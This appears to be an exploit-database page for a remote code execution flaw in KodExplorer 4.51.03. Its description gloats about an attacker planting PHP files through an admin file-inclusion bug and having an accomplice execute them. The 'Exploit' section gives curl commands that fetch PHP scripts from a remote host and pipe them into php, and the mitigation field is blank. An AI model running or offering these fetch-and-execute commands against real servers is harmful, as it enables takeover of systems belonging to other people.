header-logo
Suggest Exploit
vendor:
KodExplorer
by:
nu11secur1ty
9
CVSS
CRITICAL
Remote Code Execution (RCE)
CWE
Product Name: KodExplorer
Affected Version From: 4.51.03
Affected Version To: 4.51.03
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2023

KodExplorer v4.51.03 – Pwned-Admin File-Inclusion – Remote Code Execution (RCE)

By using this vulnerability remotely, the malicious pwned_admin can list and manipulate all files inside the server. This is an absolutely DANGEROUS and STUPID decision from the application owner! In this scenario, the attacker prepares the machine for exploitation and sends a link for remote execution by using the CURL protocol to his supporter - another attacker. Then and he waits for execution from his colleague, to mask his action or even more worst than ever. What a nice hack is this! :)

Mitigation:

Source

Exploit-DB raw data:

## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload

## Description:
By using this vulnerability remotely, the malicious pwned_admin can
list and manipulate all files inside the server. This is an absolutely
DANGEROUS and STUPID decision from the application owner! In this
scenario, the attacker prepares the machine for exploitation and sends
a link for remote execution by using the CURL protocol to his
supporter - another attacker. Then and he waits for execution from his
colleague, to mask his action or even more worst than ever. What a
nice hack is this! :)

STATUS: CRITICAL Vulnerability

[+]Exploit:
```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
| php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
| php

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)

## Proof and Exploit:
[href](https://streamable.com/98npd0)

## Time spend:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR